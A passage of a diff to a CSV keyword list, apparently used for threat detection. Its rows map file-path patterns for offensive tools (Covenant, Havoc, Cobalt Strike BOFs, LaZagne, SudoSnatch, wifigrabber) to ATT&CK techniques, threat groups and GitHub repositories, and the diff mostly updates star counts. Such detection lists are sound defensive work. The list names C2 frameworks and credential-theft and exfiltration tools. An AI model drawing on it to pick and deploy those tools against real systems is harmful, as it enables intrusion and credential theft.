CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*/couchdb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/couchdb-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Covenant*.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Covenant.git*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/CovenantUsers/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant*.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant.git*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/CovenantUsers/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Cracked5pider/*","offensive_tool_keyword","cobaltstrike","Beacon Object File 
Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" -"*/Cracked5pider/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/cracklord.git*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" -"*/cracklord/cmd/*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - 
T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*/Cracked5pider/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/cracklord.git*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*/cracklord/cmd/*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*/CrackMapExec.git","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/crackmapexec/cme.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/cradle.ps1*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","1","N/A","N/A","N/A","N/A" "*/Crassus.git*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*/Crassus-main*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*/crawler.py -u http*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" -"*/createforestcache.py*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. 
Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/createforestcache.py*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*/createstager.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/cred_dump.rc*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8267","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/cred_dump.rc*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" "*/Cred_Dump.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*/credBandit/*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 
- T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" -"*/creddump7*.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*/creddump7/*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*/creddump7/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/Credentials/*.ccache*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/Credentials/firefox_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/Credentials/msol_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
-"*/credentials/SudoSnatch*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*/credentials/wifigrabber*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*/CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/CredEnum.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/CredEnum.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/creddump7*.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/creddump7/*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/creddump7/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/Credentials/*.ccache*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/Credentials/firefox_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/Credentials/msol_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*/credentials/SudoSnatch*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/credentials/wifigrabber*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredEnum.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredEnum.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 